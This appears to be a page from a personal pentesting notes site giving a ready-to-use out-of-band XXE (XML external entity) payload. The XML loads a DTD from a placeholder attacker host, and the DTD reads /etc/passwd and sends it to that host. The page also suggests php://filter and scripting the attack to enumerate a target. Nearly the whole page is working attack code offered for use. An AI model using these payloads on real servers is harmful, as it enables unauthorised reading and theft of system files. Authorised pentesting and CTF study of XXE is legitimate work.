xct's notes
Search…
XXE

Common XXE

Sends file on target system to us:
1
<?xml version="1.0"?>
2
<!DOCTYPE xct[
3
<!ELEMENT xct ANY>
4
<!ENTITY % dtd SYSTEM "http://<attackerip>/payload.dtd">
5
%dtd;]>
6
<xct></xct>
Copied!
1
<!ENTITY % file SYSTEM "file:///etc/passwd">
2
<!ENTITY % all "<!ENTITY send SYSTEM 'http://<attackerip>/collect=%file'>">
3
%all
Copied!
Instead of File we could also use php://filter here. You probably want to script this for enumerating a target.
Last modified 1yr ago
Copy link